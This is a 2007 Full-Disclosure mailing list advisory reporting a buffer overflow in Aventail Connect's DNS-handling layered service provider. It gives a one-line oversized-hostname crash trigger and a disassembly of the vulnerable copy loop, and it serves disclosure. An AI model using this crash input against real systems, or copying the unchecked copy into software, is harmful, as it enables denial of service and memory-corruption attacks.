[Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow
thomas.pollet at gmail.com
Mon Apr 30 17:30:07 BST 2007
Aventail Connect registers a layered service provider to handle DNS queries.
When resolving a hostname the software fails to check string boundaries
As the lsp intercepts all ws2_32 dns lookups every application performing
these operations is vulnerable.
$ ssh $(perl -e 'print "a"x2200')
Segmentation fault (core dumped)
vulnerable copy loop in asnsp.dll:
18B539F2 41 INC ECX
18B539F3 41 INC ECX
18B539F4 66:85D2 TEST DX,DX
18B539F7 74 0A JE SHORT asnsp.18B53A03
18B539F9 66:8B11 MOV DX,WORD PTR DS:[ECX]
18B539FC 66:8916 MOV WORD PTR DS:[ESI],DX
18B539FF 46 INC ESI
18B53A00 46 INC ESI
18B53A01 ^EB EF JMP SHORT asnsp.18B539F2
This was tested on version 188.8.131.52.
-------------- next part --------------
An HTML attachment was scrubbed...
Full-Disclosure is hosted and sponsored by Secunia.